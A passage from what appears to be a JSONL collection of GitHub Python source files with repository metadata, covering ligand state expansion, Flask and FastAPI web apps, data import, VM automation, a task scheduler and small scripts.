\"\"\"\n Extract the state expanded ligands from the Epik output file.\n Returns\n -------\n A list of expanded state ligands.\n \"\"\"\n convert_cmd = self._create_cmd(\"utilities\", \"structconvert\")\n with open(\"structconvert.log\", \"w\") as log:\n subprocess.run(\n convert_cmd + \" output.mae output.sdf\",\n shell=True,\n stdout=log,\n stderr=log,\n check=True,\n )\n oe_mols = load_openeye_sdfs(sdf_fn=\"output.sdf\")\n # parse into ligand objects\n expanded_ligands = [Ligand.from_oemol(oemol) for oemol in oe_mols]\n return expanded_ligands\n\n def _call_epik(self):\n \"\"\"Call Epik on the local ligands file.\"\"\"\n import numpy as np\n\n epik_command = self._create_cmd(\"epik\")\n min_population = np.exp(-6)\n epik_command += f\" -WAIT -ms 16 -ph {self.ph} -p {min_population} -imae input.mae -omae output.mae\"\n with open(\"epik_log.log\", \"w\") as log:\n subprocess.run(epik_command, shell=True, stdout=log, stderr=log, check=True)\n\n def _expand(self, ligands: list[Ligand]) -> list[Ligand]:\n \"\"\"\n Expand the protomers and tautomers of the input molecules using Epik and calculate the state penalty.\n\n Note:\n All input molecules are scored by Epik and have the values stored in Ligand.tags. Only new molecules will\n have an expansion tag however. For example ethane would receive a score but no expansion tag.\n\n Parameters\n ----------\n ligands: The list of ligands whose states should be expanded.\n\n Returns\n -------\n A list of expanded ligand states.\n \"\"\"\n # store where we are as we run epik in a tempdir\n home = os.getcwd()\n # calculate it once as its expensive to call epik every time\n provenance = self.provenance()\n\n # as epic runs on all molecules we need to keep track of the parent by tagging it\n parents_by_inchikey = {}\n for lig in ligands:\n # store the parent inchi key as a tag which will be included in the sdf file\n fixed_inchikey = lig.fixed_inchikey\n lig.set_SD_data({\"parent\": fixed_inchikey})\n parents_by_inchikey[fixed_inchikey] = lig\n\n with tempfile.TemporaryDirectory() as tempdir:\n os.chdir(tempdir)\n\n # create the mae file\n self._prepare_ligands(ligands=ligands)\n\n # call epik\n self._call_epik()\n\n # convert the ligands to sdf, epik tags are automatically picked up and stored\n expanded_ligands = self._extract_ligands()\n\n # move back to the home dir\n os.chdir(home)\n\n # set the expansion tag only for new microstate ligands\n for ligand in expanded_ligands:\n # do not set the expansion tag if the molecule is the same as the parent and has a score of 0\n state_pentalty = float(ligand.tags[\"r_epik_State_Penalty\"])\n if ligand.tags[\"parent\"] == ligand.fixed_inchikey and state_pentalty == 0:\n continue\n\n parent = parents_by_inchikey[ligand.tags[\"parent\"]]\n ligand.set_expansion(parent=parent, provenance=provenance)\n\n return expanded_ligands\n","repo_name":"choderalab/asapdiscovery","sub_path":"asapdiscovery-data/asapdiscovery/data/state_expanders/protomer_expander.py","file_name":"protomer_expander.py","file_ext":"py","file_size_in_byte":7797,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"53"} +{"seq_id":"27063322046","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom flask import Flask, render_template\nfrom flask.ext.sqlalchemy import SQLAlchemy\nfrom flask.ext.cache import Cache\nfrom HTMLParser import HTMLParser\nfrom re import sub\nfrom traceback import print_exc\n\napp = Flask(__name__)\napp.config.from_object('config')\ndb = SQLAlchemy(app)\ncache = Cache(app)\n\n\nfrom apps.about.views import about\napp.register_blueprint(about,url_prefix='/about')\nfrom apps.admin.views import admin\napp.register_blueprint(admin,url_prefix='/admin')\nfrom apps.category.views import category\napp.register_blueprint(category,url_prefix='/category')\nfrom apps.tag.views import tag\napp.register_blueprint(tag,url_prefix='/tag')\nfrom apps.search.views import search\napp.register_blueprint(search,url_prefix='/search')\nfrom apps.article.views import article\napp.register_blueprint(article,url_prefix='/article')\nfrom apps.index.views import index\napp.register_blueprint(index,url_prefix='/')\n\nclass _DeHTMLParser(HTMLParser):\n def __init__(self):\n HTMLParser.__init__(self)\n self.__text = []\n\n def handle_data(self, data):\n text = data.strip()\n if len(text) > 0:\n text = sub('[ \\t\\r\\n]+', ' ', text)\n self.__text.append(text + ' ')\n\n def handle_starttag(self, tag, attrs):\n if tag == 'p':\n self.__text.append('\\n\\n')\n elif tag == 'br':\n self.__text.append('\\n')\n\n def handle_startendtag(self, tag, attrs):\n if tag == 'br':\n self.__text.append('\\n\\n')\n\n def text(self):\n return ''.join(self.__text).strip()\n\n\ndef dehtml(text):\n try:\n parser = _DeHTMLParser()\n parser.feed(text)\n parser.close()\n return parser.text()\n except:\n print_exc(file=stderr)\n return text\n\n\ndef html2textile(html):\n return dehtml(html)\n\napp.jinja_env.filters['html2textile'] = html2textile\n\n@app.errorhandler(404)\ndef page_not_found(e):\n return render_template('404.html'), 404\n\n\n@app.route('/404')\ndef error_404():\n return render_template('404.html'), 404\n\n\n@app.route('/error')\ndef error_temp(content='404'):\n return render_template('error.html', content=content)\n","repo_name":"sixu05202004/flaskblog","sub_path":"flaskblog-blueprints/flaskblog/apps/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2187,"program_lang":"python","lang":"en","doc_type":"code","stars":222,"dataset":"github-code","pt":"53"} +{"seq_id":"20253673063","text":"import torch\nfrom torch.utils.data import Dataset\n\nclass SentimentAnalysisDataset(Dataset):\n def __init__(self, tokenized_instances, labels, vocabulary_list, \n transform=None, target_transform=None):\n vocab_indexes = {}\n\n for i, w in zip(range(len(vocabulary_list)), vocabulary_list):\n vocab_indexes[w] = i\n\n self.transform = transform\n self.target_transform = target_transform\n\n # We will do something like extracting n-grams and convert them to tensors\n self.data = []\n self.labels = labels\n\n for instance in tokenized_instances:\n curr_processed_instance = []\n\n for token in instance:\n curr_processed_instance.append(vocab_indexes[token])\n \n self.data.append(curr_processed_instance)\n \n return\n\n\n\n def __len__(self):\n return len(self.data)\n\n\n\n def __getitem__(self, idx):\n instance = self.data[idx]\n label = self.labels[idx] if self.labels != None else None\n\n if self.transform:\n instance = self.transform(instance)\n\n if self.labels != None and self.target_transform:\n label = self.target_transform(label)\n\n return instance, label","repo_name":"ManosL/IMDb-Reviews-Sentiment-Analysis","sub_path":"code/sentiment_analysis_dataset.py","file_name":"sentiment_analysis_dataset.py","file_ext":"py","file_size_in_byte":1265,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"31903003156","text":"\"\"\"Movie endpoints.\"\"\"\n\nimport http\nfrom typing import List\n\nimport fastapi\nimport pydantic\nfrom fastapi import status\nfrom sqlmodel.ext.asyncio import session as aio_session\n\nfrom app.api import dependencies\nfrom app.crud import movie as movie_crud\nfrom app.models import movie as movie_model\nfrom app.models import patron as patron_model\nfrom app.models import response\n\nrouter = fastapi.APIRouter()\n\n\n@router.post(\"/\",\n response_model=movie_model.MovieRead,\n status_code=201,\n responses={\n 401: {\n \"model\": response.Response\n },\n 409: {\n \"model\": response.Response\n }\n })\nasync def create_movie(\n *,\n session: aio_session.AsyncSession = fastapi.Depends(\n dependencies.get_session),\n movie_in: movie_model.MovieCreate,\n current_patron: patron_model.Patron = fastapi.Depends( # pylint: disable=unused-argument\n dependencies.get_current_active_patron),\n) -> movie_model.Movie:\n \"\"\"Creates a new movie.\"\"\"\n movie_db = await movie_crud.MovieCRUD.get_by_title(session,\n movie_in.title_en)\n\n if movie_db:\n raise fastapi.HTTPException(\n status_code=status.HTTP_409_CONFLICT,\n detail=\"An movie with this title already exists in the system.\",\n )\n if current_patron.id != movie_in.proposed_by:\n raise fastapi.HTTPException(\n status_code=status.HTTP_401_UNAUTHORIZED,\n detail=\"https://www.youtube.com/watch?v=Z4oDZCJMDeY\")\n\n movie = await movie_crud.MovieCRUD.create(session, model_in=movie_in)\n\n return movie\n\n\n@router.get(\"/{movie_id}\",\n response_model=movie_model.MovieReadWithPatron,\n responses={\n 401: {\n \"model\": response.Response\n },\n 404: {\n \"model\": response.Response\n }\n })\nasync def read_movie(\n *,\n session: aio_session.AsyncSession = fastapi.Depends(\n dependencies.get_session),\n movie_id: pydantic.UUID4,\n current_patron: patron_model.Patron = fastapi.Depends( # pylint: disable=unused-argument\n dependencies.get_current_active_patron),\n) -> movie_model.Movie:\n \"\"\"Returns a movie given the id.\"\"\"\n movie = await movie_crud.MovieCRUD.read(session, movie_id)\n\n if not movie:\n raise fastapi.HTTPException(status_code=status.HTTP_404_NOT_FOUND,\n detail=\"Movie not found.\")\n\n return movie\n\n\n@router.get(\"/\",\n response_model=List[movie_model.MovieRead],\n responses={401: {\n \"model\": response.Response\n }})\nasync def read_movie_list(\n session: aio_session.AsyncSession = fastapi.Depends(\n dependencies.get_session),\n current_patron: patron_model.Patron = fastapi.Depends( # pylint: disable=unused-argument\n dependencies.get_current_active_patron),\n offset: int = 0,\n limit: int = fastapi.Query(default=100, le=100),\n) -> List[movie_model.Movie]:\n \"\"\"Returns a list of movies.\"\"\"\n return await movie_crud.MovieCRUD.read_multi(session,\n offset=offset,\n limit=limit)\n\n\n@router.put(\"/\",\n response_model=movie_model.MovieRead,\n responses={\n 401: {\n \"model\": response.Response\n },\n 404: {\n \"model\": response.Response\n }\n })\nasync def update_movie(\n *,\n session: aio_session.AsyncSession = fastapi.Depends(\n dependencies.get_session),\n current_patron: patron_model.Patron = fastapi.Depends( # pylint: disable=unused-argument\n dependencies.get_current_active_patron),\n movie_id: pydantic.UUID4,\n movie_in: movie_model.MovieUpdate,\n) -> movie_model.Movie:\n \"\"\"Updates a movie.\"\"\"\n movie_db = await movie_crud.MovieCRUD.read(session, movie_id)\n\n if not movie_db:\n raise fastapi.HTTPException(status_code=status.HTTP_404_NOT_FOUND,\n detail=\"Movie not found.\")\n if current_patron.id != movie_db.proposed_by:\n raise fastapi.HTTPException(\n status_code=status.HTTP_401_UNAUTHORIZED,\n detail=\"https://www.youtube.com/watch?v=Z4oDZCJMDeY\")\n\n movie_db = await movie_crud.MovieCRUD.update(session,\n model_db=movie_db,\n model_in=movie_in)\n\n return movie_db\n\n\n@router.delete(\"/\",\n status_code=204,\n responses={\n 401: {\n \"model\": response.Response\n },\n 404: {\n \"model\": response.Response\n }\n })\nasync def delete_movie(\n *,\n session: aio_session.AsyncSession = fastapi.Depends(\n dependencies.get_session),\n movie_id: pydantic.UUID4,\n current_patron: patron_model.Patron = fastapi.Depends( # pylint: disable=unused-argument\n dependencies.get_current_active_superuser),\n):\n \"\"\"Deletes a movie.\"\"\"\n movie_db = await movie_crud.MovieCRUD.read(session, movie_id)\n\n if not movie_db:\n raise fastapi.HTTPException(status_code=status.HTTP_404_NOT_FOUND,\n detail=\"Movie not found.\")\n\n await movie_crud.MovieCRUD.delete(session, movie_id)\n\n return fastapi.Response(status_code=http.HTTPStatus.NO_CONTENT.value)\n","repo_name":"lamu-ai/beatrice","sub_path":"beatrice/backend/app/api/v1/movie.py","file_name":"movie.py","file_ext":"py","file_size_in_byte":5670,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"74278231527","text":"import os\nimport sys\ntry:\n from reponse_utils import *\nexcept Exception as e:\n # Ajout du répértoire parent au chemin.\n currentdir = os.getcwd()\n parentdir = os.path.dirname(currentdir)\n sys.path.insert(0, parentdir)\n from reponse_utils import *\n\n\ndef nombre_mystere():\n \"\"\"\n Fonction qui renvoie le nombre mystere de l'enigme\n\n @arg : Aucun\n @return : int -> Le nombre mystere\n \"\"\"\n for nb_possible in range(123456789, 987654322):\n if \"0\" in str(nb_possible) or not str(nb_possible)[4] == '5' or not len(set(str(nb_possible))) == 9:\n continue\n counter = 0\n for i in range(0, 9):\n nb_test = int(nb_possible / 10**i)\n if not nb_test % (9 - i):\n counter += 1\n else:\n break\n if counter == 9:\n return nb_possible\n\n\ndef reponse_enigme2(nb_propose):\n try:\n nb_propose = int(nb_propose)\n except Exception as e:\n return {\"reponse\": nb_propose, \"status\": \"echec\", \"msg\": \"Assurez vous de fournir un nombre entier (ou une chaine de caractère numérique)\"}\n if nb_propose == 381654729:\n return {\"reponse\": nb_propose, \"status\": \"succés\", \"msg\": \"Bravo, le nombre proposé est le bon\"}\n if not len(str(nb_propose)) == 9:\n return {\"reponse\": nb_propose, \"status\": \"echec\", \"msg\": \"Le nombre proposé ne contient pas le bon nombre de chiffres\"}\n if \"0\" in str(nb_propose):\n return {\"reponse\": nb_propose, \"status\": \"echec\", \"msg\": f\"Le nombre ne doit pas contenir de 0\"}\n if not len(set(str(nb_propose))) == 9:\n return {\"reponse\": nb_propose, \"status\": \"echec\", \"msg\": \"Le nombre proposé contient plusieur fois le même chiffre\"}\n for i in range(0, 9):\n nb_test = int(nb_propose / 10**i)\n if nb_test % (9 - i):\n return {\"reponse\": nb_propose, \"status\": \"echec\", \"msg\": f\"Le nombre composé des {9 - i} premiers chiffres du nombre {nb_propose} n'est pas divisible par {9 - i}\"}\n\n\n# @pep8\n@timer\ndef code_enigme2(fonction):\n return fonction\n\n\nif __name__ == '__main__':\n print(code_enigme2(nombre_mystere()))\n","repo_name":"xtinoux/fifo_and_lifo","sub_path":"app/enigme2/enigme2.py","file_name":"enigme2.py","file_ext":"py","file_size_in_byte":2214,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71175497128","text":"import pypianoroll\nimport matplotlib.pyplot as plt\nPATH = \"\"\nmultitrack = pypianoroll.read(PATH)\nmultitrack.binarize()\ntrack = multitrack\n#track = multitrack.tracks[2]\ntrack.trim(0, 200 * multitrack.resolution)\ntrack.binarize()\ntrack.plot(grid_axis = 'off',xtick='off',xticklabel=False)\nplt.show()\n","repo_name":"FreddieHorn/generating-music-belonging-to-a-given-genre","sub_path":"visualization.py","file_name":"visualization.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1308753532","text":"from sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nimport pandas as pd\nfrom datetime import date\nimport pymysql\npymysql.install_as_MySQLdb()\nimport time\nimport sys\nimport os\n\nfrom os import path\nsys.path.append(path.dirname( path.dirname( path.abspath(__file__) ) ))\nfrom models.movie import Movie\nfrom config import SQLALCHEMY_DATABASE_URI\n\ns = time.time()\n\ndir = './data/movie/'\nfiles = [i for i in os.listdir(dir) if i.endswith('last_of_last.csv')]\nprint(\"작업파일:\\t\",files)\n\nengine = create_engine(SQLALCHEMY_DATABASE_URI)\n\nSession = sessionmaker(bind=engine)\nsession = Session()\nprint(\"연결 성공\")\n\n\n# Movie 테이블 삭제, 생성\nMovie.__table__.drop(bind=engine)\nMovie.__table__.create(bind=engine)\n\ndef convert_release_date(release_date):\n '''\n '2021 .09.09 재개봉, 2020 .05.21 재개봉, 2019 .10.30 개봉'으로 써진 개봉일의\n 개행문자, 한글, 특수문자를 지우고 년, 월, 일로 나눈 뒤에\n date format으로 변환시켜줌\n '''\n release_date = release_date.split(',')[-1]\n release_date = release_date.replace(\" \",'').replace('개봉','').split('.')\n \n if len(release_date) == 1: # 개봉년, 월만 있는 경우\n year = int(release_date[0])\n month = 1\n day = 1\n\n elif len(release_date) == 2: # 개봉년, 월만 있는 경우\n year, month = map(int,release_date)\n day = 1\n\n else:\n year, month, day = map(int,release_date)\n \n release_date = date(year, month, day).isoformat()\n return release_date\n\ndef convert_running_time(running_time):\n '''\n xxx분 으로 써진 상영시간의 분을 떼고 INT로 변환\n '''\n return int(running_time[:-1])\n\n\nfor file_path in files:\n print(file_path)\n data = pd.read_csv(path.join(dir,file_path), encoding='utf-8')\n\n data['release_date'] = data['release_date'].apply(convert_release_date)\n data['running_time'] = data['running_time'].apply(convert_running_time)\n\n for i in range(len(data)):\n title = data.loc[i,\"title\"]\n release_date = data.loc[i,\"release_date\"]\n actor = data.loc[i,\"actor\"]\n director = data.loc[i,\"director\"]\n summary = data.loc[i,\"summary\"]\n running_time = data.loc[i,\"running_time\"]\n genre = data.loc[i,\"genre\"]\n rating = data.loc[i,\"grade\"]\n poster = data.loc[i,\"poster\"]\n nation = data.loc[i,\"nation\"]\n \n movie = Movie(\n title = title,\n release_date = release_date,\n actor = actor,\n director = director,\n summary = summary,\n running_time = running_time,\n poster = poster,\n genre = genre,\n rating = rating,\n nation = nation,\n )\n session.add(movie)\nsession.commit()\nsession.close()\ne = time.time()\nprint(f'작업 완료:\\t{e-s:.2f}초')\n","repo_name":"pepper29/Food-Recommendation-Project","sub_path":"참고자료/해시태그를 이용한 영화검색챗봇/server/flask/utils/add_movie.py","file_name":"add_movie.py","file_ext":"py","file_size_in_byte":2973,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"18649365195","text":"from vmwarelib import inventory\nfrom vmwarelib.actions import BaseAction\n\n\nclass VMDestroy(BaseAction):\n\n def run(self, vm_id):\n # convert ids to stubs\n vm = inventory.get_virtualmachine(self.si_content, moid=vm_id)\n\n task = vm.Destroy_Task()\n success = self._wait_for_task(task)\n\n # verify status is running.\n return {\"status\": success}\n","repo_name":"cibingeorge/st2contrib","sub_path":"packs/vsphere/actions/vm_destroy.py","file_name":"vm_destroy.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"74897237607","text":"# need fix\n# https://www.acmicpc.net/problem/1920\n# 런타임에러\n\nnum1=0\nnum2=0\nnum1_arr=[]\nnum2_arr=[]\nsol=[]\nzero = 0\n\nnum1=int(input())\nfor n1 in range(num1):\n a = input()\n num1_arr.append(a)\n\nnum2 = int(input())\nfor n2 in range(num2):\n b=input()\n num2_arr.append(b)\n sol.append(zero)\n\nn1=0;n2=0\n\nfor n2 in range(num2):\n for n1 in range(num1):\n if(num2_arr[n2]==num1_arr[n1]):\n sol[n2]=1\nfor i in range(len(sol)):\n print(sol[i])","repo_name":"chjwon/BOJ_answer_py","sub_path":"need_fix/1920.py","file_name":"1920.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"75103125287","text":"from __future__ import annotations\n\nfrom collections import OrderedDict\nfrom typing import TYPE_CHECKING, Any, Dict, List\n\nfrom ml_metadata import proto\n\nfrom coalescenceml.enums import ExecutionStatus\nfrom coalescenceml.logger import get_logger\n\n\nif TYPE_CHECKING:\n from coalescenceml.metadata_store import BaseMetadataStore\n from coalescenceml.post_execution.step import StepView\n\nlogger = get_logger(__name__)\n\n\nclass PipelineRunView:\n \"\"\"Post-execution pipeline run class which can be used to query\n steps and artifact information associated with a pipeline execution.\n \"\"\"\n\n def __init__(\n self,\n id_: int,\n name: str,\n executions: List[proto.Execution],\n metadata_store: BaseMetadataStore,\n ):\n \"\"\"Initializes a post-execution pipeline run object.\n In most cases `PipelineRunView` objects should not be created manually\n but retrieved from a `PipelineView` object instead.\n Args:\n id_: The context id of this pipeline run.\n name: The name of this pipeline run.\n executions: All executions associated with this pipeline run.\n metadata_store: The metadata store which should be used to fetch\n additional information related to this pipeline run.\n \"\"\"\n self._id = id_\n self._name = name\n self._metadata_store = metadata_store\n\n self._executions = executions\n self._steps: Dict[str, StepView] = OrderedDict()\n\n @property\n def name(self) -> str:\n \"\"\"Returns the name of the pipeline run.\"\"\"\n return self._name\n\n @property\n def status(self) -> ExecutionStatus:\n \"\"\"Returns the current status of the pipeline run.\"\"\"\n step_statuses = (step.status for step in self.steps)\n\n if any(status == ExecutionStatus.FAILED for status in step_statuses):\n return ExecutionStatus.FAILED\n elif all(\n status == ExecutionStatus.COMPLETED\n or status == ExecutionStatus.CACHED\n for status in step_statuses\n ):\n return ExecutionStatus.COMPLETED\n else:\n return ExecutionStatus.RUNNING\n\n @property\n def steps(self) -> List[StepView]:\n \"\"\"Returns all steps that were executed as part of this pipeline run.\"\"\"\n self._ensure_steps_fetched()\n return list(self._steps.values())\n\n def get_step_names(self) -> List[str]:\n \"\"\"Returns a list of all step names.\"\"\"\n self._ensure_steps_fetched()\n return list(self._steps.keys())\n\n def get_step(self, name: str) -> StepView:\n \"\"\"Returns a step for the given name.\n Args:\n name: The name of the step to return.\n Raises:\n KeyError: If there is no step with the given name.\n \"\"\"\n self._ensure_steps_fetched()\n try:\n return self._steps[name]\n except KeyError:\n raise KeyError(\n f\"No step found for name `{name}`. This pipeline \"\n f\"run only has steps with the following \"\n f\"names: `{self.get_step_names()}`\"\n )\n\n def _ensure_steps_fetched(self) -> None:\n \"\"\"Fetches all steps for this pipeline run from the metadata store.\"\"\"\n if self._steps:\n # we already fetched the steps, no need to do anything\n return\n\n self._steps = self._metadata_store.get_pipeline_run_steps(self)\n\n def __repr__(self) -> str:\n \"\"\"Returns a string representation of this pipeline run.\"\"\"\n return (\n f\"{self.__class__.__qualname__}(id={self._id}, \"\n f\"name='{self._name}')\"\n )\n\n def __eq__(self, other: Any) -> bool:\n \"\"\"Returns whether the other object is referring to the same\n pipeline run.\"\"\"\n if isinstance(other, PipelineRunView):\n return (\n self._id == other._id\n and self._metadata_store.uuid == other._metadata_store.uuid\n )\n return False\n","repo_name":"bayoumi17m/CoalescenceML","sub_path":"src/coalescenceml/post_execution/pipeline_run.py","file_name":"pipeline_run.py","file_ext":"py","file_size_in_byte":4032,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"13897633462","text":"\n#import sys\nfrom pptree import *\t\ninp = input().split()\nn=int(inp[0])\nk=int(inp[1])\nlll=input().split()\nls=[int(i) for i in lll]\nfstore={}\nbstore={}\n#sys.setrecursionlimit(3*n)\nr1=Node('f('+str(k-1)+')')\nr2=Node('f('+str(n-1)+')')\ndef forward(i,root):\n\tres=0\n\tif i==n-1:\n\t\troot.name=root.name+'='+str(ls[n-1])\n\t\treturn ls[n-1]\n\telif i==n-2:\n\t\tchild=Node('f('+str(n-1)+')'+str(ls[n-1])+':',root)\n\t\tres=forward(n-1,child)\n\t\troot.name=root.name+'='+str(ls[n-2]+res)\n\t\treturn ls[n-2]+res\n\telif i in fstore:\n\t\troot.name=root.name+'='+str(res)\n\t\tres=fstore[i]\n\telse:\n\t\tchild1=Node('f('+str(i+1)+')'+str(ls[i+1])+':',root)\n\t\tchild2=Node('f('+str(i+2)+')'+str(ls[i+1])+':',root)\n\t\tfstore[i]=max(ls[i]+forward(i+1,child1),ls[i]+forward(i+2,child2))\n\t\tres=fstore[i]\n\t\troot.name=root.name+'='+str(res)\n\treturn res\ndef back(j,root):\n\tif j==0:\n\t\troot.name=root.name+'='+str(ls[0])\n\t\treturn ls[0]\n\telif j==1:\n\t\tchild=Node('f('+str(j-1)+'):',root)\n\t\tres=back(j-1,child)\n\t\troot.name=root.name+'='+str(ls[1]+res)\n\t\treturn ls[1]+res\n\telif j in bstore:\n\t\troot.name=root.name+'='+str(bstore[j])\n\t\treturn bstore[j]\n\telse:\n\t\tchild1=Node('f('+str(j-1)+')'+str(ls[j-1])+':',root)\n\t\tchild2=Node('f('+str(j-2)+')'+str(ls[j-2])+':',root)\n\t\tbstore[j]= max(ls[j]+back(j-1,child1),ls[j]+back(j-2,child2))\n\t\troot.name=root.name+'='+str(bstore[j])\n\t\treturn bstore[j]\n\na=forward(k-1,r1)-ls[k-1]\nb=back(n-1,r2)-ls[n-1]\nprint('a:',a)\nprint('b:',b)\nprint_tree(r1)\nprint_tree(r2)","repo_name":"Shubhamsharda/Competetive-Programming","sub_path":"scscsc.py","file_name":"scscsc.py","file_ext":"py","file_size_in_byte":1443,"program_lang":"python","lang":"fa","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24894183949","text":"import datetime\nimport fcntl\nimport logging\nimport multiprocessing\nimport os\nimport sched\nimport time\n\nfrom .decorators import cached_property\n\n\nONE_DAY = datetime.timedelta(days=1)\n\n\nclass DailyTasksProcess(multiprocessing.Process):\n\n \"\"\"A simple daily task runner.\n\n .. note:: If your needs are more complex than running more than a\n handful of daily tasks, you probably shouldn't use this.\n\n This is an alternative to cron and Celery. The former is hard to get\n set up on ARC VMs; the latter is overkill when you just need to run\n a task or two once a day (and adds more points of failure).\n\n Now, it can certainly be argued that this adds complexity and is\n non-standard. On the other hand, what we've seen in practice are\n several different kinds of workarounds (AKA hacks) for the \"run a\n couple of daily tasks without massive pain\" problem. This at least\n provides *one* recommended way of running daily tasks.\n\n This is used by adding the following to the *bottom* of a project's\n wsgi.py::\n\n if not settings.DEBUG:\n from arcutils.tasks import DailyTasksProcess\n daily_tasks = DailyTasksProcess(home=root)\n # Rebuild the search index at 3:01am every day\n daily_tasks.add_task(call_command, 3, 1, ('rebuild_index',), {'interactive': False})\n daily_tasks.start()\n\n .. note:: :func:`django.core.wsgi.get_wsgi_application` *should* be\n called before adding tasks to ensure the environment is\n fully configured before any tasks are run.\n\n .. note:: In production, multiple mod_wsgi processes may be started,\n and each of them will execute the code as shown above, but\n only *one* of those mod_wsgi process will initialize a\n :class:`DailyTasksProcess` to run the specified tasks.\n\n \"\"\"\n\n def __init__(self, *args, home=None, lock_file_path=None, daemon=True, **kwargs):\n super().__init__(*args, daemon=daemon, **kwargs)\n home = home or os.getcwd()\n\n if lock_file_path is None:\n lock_file_name = '.{cls.__module__}.{cls.__qualname__}.lock'.format(cls=self.__class__)\n lock_file_path = os.path.join(home, lock_file_name)\n\n self.home = home\n self.lock_file_path = lock_file_path\n self.lock_file = open(self.lock_file_path, 'w')\n\n try:\n fcntl.flock(self.lock_file, fcntl.LOCK_EX | fcntl.LOCK_NB)\n except BlockingIOError:\n # Already locked; some other process is running daily tasks.\n self.add_task = self._noop\n self.start = self._noop\n self.lock_file.close()\n else:\n self.scheduler = sched.scheduler(time.time)\n\n @cached_property\n def log(self, *args, **kwargs):\n return logging.getLogger(__name__)\n\n def add_task(self, task, hour, minute=0, args=(), kwargs=None, name=None):\n \"\"\"Add a task to be run daily at the given hour and minute.\n\n ``hour`` must be an int between 0 and 23 (inclusive).\n\n ``minute`` must be an int between 0 and 59 (inclusive).\n\n ``task`` will be called as ``task(*args, **kwargs)``.\n\n ``name`` is a display name for the task; it's shown in log\n messages. If a ``name`` isn't passed, this will default to\n ``task.__name__``.\n\n \"\"\"\n name = name or task.__name__\n\n log = self.log\n log.info('Adding daily task %s at %d:%d', name, hour, minute)\n\n assert isinstance(hour, int), 'hour must be an int'\n assert 0 <= hour < 24, 'hour must be in [0, 23]'\n assert isinstance(minute, int), 'minute must be an int'\n assert 0 <= minute < 60, 'hour must be in [0, 59]'\n\n now = datetime.datetime.now()\n date_part = now.date()\n time_part = datetime.time(hour, minute, 0, 0)\n scheduled_time = datetime.datetime.combine(date_part, time_part)\n\n if scheduled_time <= now:\n scheduled_time += ONE_DAY\n\n log.info('First run of %s will be at %s', name, scheduled_time)\n\n kwargs = {} if kwargs is None else kwargs\n\n def action():\n nonlocal scheduled_time\n log.info('Running task %s with %s and %s...', name, args, kwargs)\n task(*args, **kwargs)\n scheduled_time += ONE_DAY\n log.info('Rescheduling %s for %s', name, scheduled_time)\n self.scheduler.enterabs(scheduled_time.timestamp(), None, action)\n\n self.scheduler.enterabs(scheduled_time.timestamp(), None, action)\n\n def run(self):\n self.lock_file.write(str(self.pid))\n self.lock_file.write('\\n')\n self.lock_file.flush()\n try:\n if self.scheduler.empty():\n raise RuntimeError(\n 'No tasks have been added; one or more tasks must be added via add_task() '\n 'before start() is called')\n self.scheduler.run()\n finally:\n fcntl.flock(self.lock_file, fcntl.LOCK_UN)\n self.lock_file.close()\n os.remove(self.lock_file_path)\n\n def _noop(self, *args, **kwargs):\n pass\n","repo_name":"PSU-OIT-ARC/django-arcutils","sub_path":"arcutils/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":5159,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"24735971637","text":"from itertools import izip\nimport collections\nfrom sets import Set\nimport sys\nfrom math import log\n\nNUM_TWEETS_PER_USER = sys.argv[1]\nNUM_TOPICS_PER_USER = sys.argv[2]\n\nprint(NUM_TWEETS_PER_USER)\nprint(NUM_TOPICS_PER_USER)\n\n\nnum_topics = 3\n\nf_users = open('user_id_100.txt', 'r')\nf_topics = open('ldaoutput_500.txt', 'r')\nf_neighbors = open('new_sample_edges.txt', 'r')\n\nuser_list = []\nuser_topic_dict = {} #top 3 topics\nuser_topic_dict_all = {}\nuser_neighbors = {}\n\nfor line in f_users:\n\tuser_list.append(line.rstrip())\n\nf_users.close()\n\nline_num = 0\nfor line in f_topics:\n\tfloat_list = [float(x) for x in line.split()]\n\tif(len(float_list) != 10):\n\t\tprint(\"Wrong number of topics\")\n\t\tsys.exit(0)\n\tuser_topic_dict_all[user_list[line_num]] = float_list\n\tsorted_list = sorted(float_list)[-num_topics:]\n\tx, y, z = sorted_list\n\tuser_topic_dict[user_list[line_num]] = [float_list.index(x), float_list.index(y), float_list.index(z)]\n\tline_num += 1\n\nf_topics.close()\n\nfor line in f_neighbors:\n\tu, v = line.split()\n\tif u not in user_neighbors:\n\t\tuser_neighbors[u] = Set(v)\n\telse:\n\t\tuser_neighbors[u].add(v)\n\tif v not in user_neighbors:\n\t\tuser_neighbors[v] = Set(u)\n\telse:\n\t\tuser_neighbors[v].add(u)\n\nf_neighbors.close()\n\ndef isHomophilous(x, y, choice):\n\tif choice == 0 :\n\t\tif(len(Set(x).intersection(Set(y))) > 0):\n\t\t\treturn 1\n\t\telse:\n\t\t\treturn 0\n\telif choice == 1:\n\t\treturn len(Set(x).intersection(Set(y)))/float(num_topics)\n\ndef originalMeasures():\n\tf_homophily_binary = open(\"homophily_binary_\" + str(NUM_TWEETS_PER_USER) + \"_\" + str(NUM_TOPICS_PER_USER) + \".txt\", 'w')\n\tf_homophily_ratios = open(\"homophily_ratios_\" + str(NUM_TWEETS_PER_USER) + \"_\" + str(NUM_TOPICS_PER_USER) + \".txt\", 